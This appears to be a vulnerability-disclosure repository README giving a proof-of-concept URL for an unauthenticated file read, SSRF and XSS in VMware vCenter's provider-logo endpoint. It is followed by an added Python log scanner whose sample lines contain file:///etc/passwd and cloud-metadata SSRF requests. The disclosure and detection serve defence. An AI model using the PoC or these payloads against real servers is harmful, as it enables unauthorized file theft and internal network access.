[
  {
    "path": "README.md",
    "content": "# VMware vCenter (7.0.2.00100 and earlier) unauthenticated arbitrary file read + SSRF + XSS vulnerability\n## POC\nhttps://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}\n\nThe endpoint fetches whatever `{url}` is given and returns the result to the caller with no login required, so the same parameter yields an arbitrary file read, an SSRF and, because the fetched content is reflected back in the response, an XSS.\n\nFile read:\n\n![](./file_read.PNG)\n\nSSRF + XSS:\n\n![](./xss.PNG)\n\n## Vulnerable code\n/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar\n\ncom.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()\n\n![](./code.PNG)\n\nTested on vCenter 7.0.2.00100; the exact affected version range and CVE ID are not known.\n"
  }
]
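As an added example (not part of this repository or of VMware's code), the detection a defender would want alongside the PoC above: a script that scans web access log lines for requests to the `provider-logo` endpoint and flags `url` values that point at local resources (non-http(s) scheme) or at internal addresses (loopback, private, link-local, `localhost`). The sample log lines are constructed here and use a combined-log-like format, which is an assumption; the exact payload shapes (`file://`, loopback and metadata-service targets) are likewise assumptions about what the file-read and SSRF requests look like, since the page shows them only in screenshots. Hostnames are not resolved, so only literal IPs and `localhost` are classified.

```python
"""Flag suspicious requests to the vSphere UI vcav-bootstrap provider-logo endpoint.

Added example, not part of the original repository. Assumptions (labelled):
- the log lines below are constructed by hand in a combined-log-like format;
  the real vSphere UI log format may differ and need a different regex.
- a benign provider-logo request points at a public http(s) host; any other
  URL scheme is treated as a local-resource (file read) attempt and any
  loopback/private/link-local target as an SSRF attempt.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"

# Constructed sample traffic (not real logs): one benign logo fetch, a
# file-read attempt, two SSRF attempts and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2021:10:00:01 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https%3A%2F%2Fcdn.example.com%2Flogo.png HTTP/1.1" 200 4120
203.0.113.9 - - [01/Jun/2021:10:00:07 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1866
203.0.113.9 - - [01/Jun/2021:10:00:12 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http%3A%2F%2F127.0.0.1%3A8080%2F HTTP/1.1" 200 512
203.0.113.9 - - [01/Jun/2021:10:00:20 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 300
10.0.0.5 - - [01/Jun/2021:10:00:30 +0000] "GET /ui/app/ HTTP/1.1" 200 9000
"""

# Assumed combined-log layout: client, ident, user, [time], "METHOD target proto", status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_url(raw_url: str) -> str:
    """Classify one decoded url= value.

    Returns 'non_http_scheme' (server would read a local resource, e.g. file:),
    'internal_target' (loopback/private/link-local/localhost: SSRF),
    'invalid' (no host) or 'benign'.
    """
    parts = urlsplit(raw_url)
    if parts.scheme.lower() not in ("http", "https"):
        return "non_http_scheme"
    host = parts.hostname or ""
    if not host:
        return "invalid"
    if host == "localhost":
        return "internal_target"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Other hostnames are not resolved offline, so they pass as benign here.
        return "benign"
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_unspecified):
        return "internal_target"
    return "benign"


def analyze_log(log_text: str) -> list:
    """Return one finding per suspicious url= value sent to the vulnerable path."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != VULN_PATH:
            continue
        # parse_qs percent-decodes the value, so file%3A%2F%2F... becomes file://...
        for raw in parse_qs(target.query).get("url", []):
            verdict = classify_url(raw)
            if verdict != "benign":
                findings.append({
                    "src": m.group("src"),
                    "url": raw,
                    "verdict": verdict,
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['src']:15} {f['verdict']:16} status={f['status']} url={f['url']}")
```

A 200 status on a flagged request is the signal that the server actually fetched the target; pair the source address with the timestamps to scope what an attacker pulled. Run it against a real log by replacing `SAMPLE_LOG` with the file contents and adjusting `LOG_RE` to the actual format.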